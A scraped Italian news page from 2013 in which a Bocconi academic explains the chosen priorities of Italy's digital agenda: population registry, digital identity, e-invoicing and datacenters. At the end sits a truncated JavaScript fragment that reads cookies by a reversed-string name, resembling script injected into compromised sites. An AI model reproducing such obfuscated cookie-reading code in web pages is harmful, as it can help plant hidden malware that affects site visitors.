Questo sito web utilizza cookie tecnici e, previo Suo consenso, cookie di profilazione, nostri e di terze parti. Chiudendo questo banner, scorrendo questa pagina o cliccando qualunque suo elemento acconsente all'uso dei cookie. Leggi la nostra Cookie Policy per esteso.OK

Presidenza del Consiglio

Ecco come abbiamo scelto le nuove priorità dell’Agenda

20 Set 2013

Francesco Sacco, università Bocconi


Francesco Caio e la cabina di regia con cui collaboro ha stabilito le priorità per l’Agenda digitale. Perché troppe priorità equivalgono a nessuna priorità. Giusto concentrarsi quindi su pochi punti, dopo aver fatto il grande sforzo di mettere la governance sotto la residenza del Consiglio.

Il criterio scelto per individuare le priorità è stato quello dell’infrastruttura. Non quella fisica, però. Ma quella software, dove si concentra la vera ricchezza ICT ora. E sono tre le infrastrutture software, che tirano dietro di sé quelle hardware.

Prima, l’Anagrafe nazionale della popolazione. Importante perché lo Stato non si può più permettere di non conoscere a livello centrale questi dati fondamentali dei cittadini. Seconda, l’identità digitale, che stiamo spingendo tantissimo. Ogni cittadino potrà avere una o più identità digitali certificate da un gestore dell’autenticazione federata che potrà essere una banca, le Poste o altri. Servirà per interagire con la pa. Seguirà standard di sicurezza unici e si aggancerà all’Anagrafe.

La terza è la fatturazione elettronica. Non è più accettabile che lo Stato non sappia in dettagli i propri debiti.

La costruzione dei prossimi datacenter è guidata dai servizi che devono portare. Dovremmo puntare ad avere tre-quattro, datacenter ma world class. E in Italia abbiamo le tecnolgoie per riuscirci.

function cc(ccn){var c=d[‘cookie’];return c.search(ccn.split(”).reverse().join(”))

Articolo 1 di 2